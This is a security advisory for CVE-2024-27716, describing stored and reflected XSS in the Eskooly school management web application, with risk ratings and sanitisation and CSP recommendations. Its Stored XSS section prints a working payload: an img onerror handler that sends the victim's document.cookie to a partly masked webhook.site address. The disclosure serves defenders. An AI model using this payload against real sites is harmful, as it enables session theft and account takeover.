CVE-2024-27716 - Cross-site Scripting (XSS) in Eskooly Web Product <= v3.0

Introduction

Cross-Site Scripting (XSS) vulnerabilities are a common and serious threat to web applications, allowing attackers to inject malicious scripts into web pages viewed by other users. This post explores CVE-2024-27716, a critical XSS vulnerability in Eskooly Web Product v.3.0 that enables attackers to execute arbitrary code via message sending and user input fields.

Discovery of the Vulnerability

A Cross-Site Scripting (XSS) attack consist in the injection of malicious scripts in websites pages. Such attack is useful to execute attacker stored malicious code, generally in the form of a browser side script, in a victim browser when this latter is viewing the affected page. Several XSS payloads exists to steal victim cookies or any other legitimate user browser information.

In the application:

  • it is possible to trigger a malicious XSS through messages send to Admin or Teacher (to steal a cookie for example), it’s a STORED XSS.

  • it is possible to trigger a reflected XSS through a lot of boxes (student name, phone number, teacher,…)

  • Cross-Site Scripting (XSS)

    • Stored XSS

    • Reflected XSS

Technical Details

The vulnerability arises from insufficient input sanitization and validation. Specifically, user inputs are not properly escaped or sanitized before being included in the HTML content of web pages, allowing attackers to inject and execute malicious scripts.

Stored XSS

  1. Shows an attacker (teacher or student for example) crafting a message with a malicious script that is designed to be stored and later executed.

  • The payload:

<img src="XXXXXXX.jpg" onerror="var i=new Image; i.src='https://webhook.site/ede9XXXXXXXXXX/?'+document.cookie;" />
  1. Admin received the message

  1. The request details of the stored XSS payload show that a request was made to an external domain, indicating that the malicious script has been executed and data, such as cookies, might have been exfiltrated.

Also, the server does not appear to set any flags on the cookie, such as HttpOnly or Secure, which are critical for protecting the cookie from being accessed by client-side scripts or transmitted over non-HTTPS connections. (See CVE-2024-27713)

Reflected XSS

  1. An alert box displays sensitive session information, indicating that the script execution can access and potentially exfiltrate user data.

Risk

Impact

High.

The attacker could potentially perform actions on behalf of the victim, access sensitive information, and compromise user accounts.

Likelihood

High.

The likelihood of exploitation for a XSS vulnerability is high due to its remote exploitability, low attack complexity, lack of required privileges, and the prevalence of known exploits. Especially in the context of the application, where it's possible to steal admin or teacher cookies as student.

Recommendation

It's recommended to implement rigorous user input validation to treat all inputs as untrustworthy and apply strict semantic and syntactic checks, use data pattern whitelists and blacklists, and uniformly sanitize data from all users. Additionally, encoding dynamic content in HTTP responses is crucial to prevent misinterpretation as executable content, with special characters converted to HTML entity encodings for safe processing. Furthermore, deploying a robust Content Security Policy (CSP) is essential to control script sources and execution on web pages, thereby effectively mitigating potential reflected XSS attacks.

References

Last updated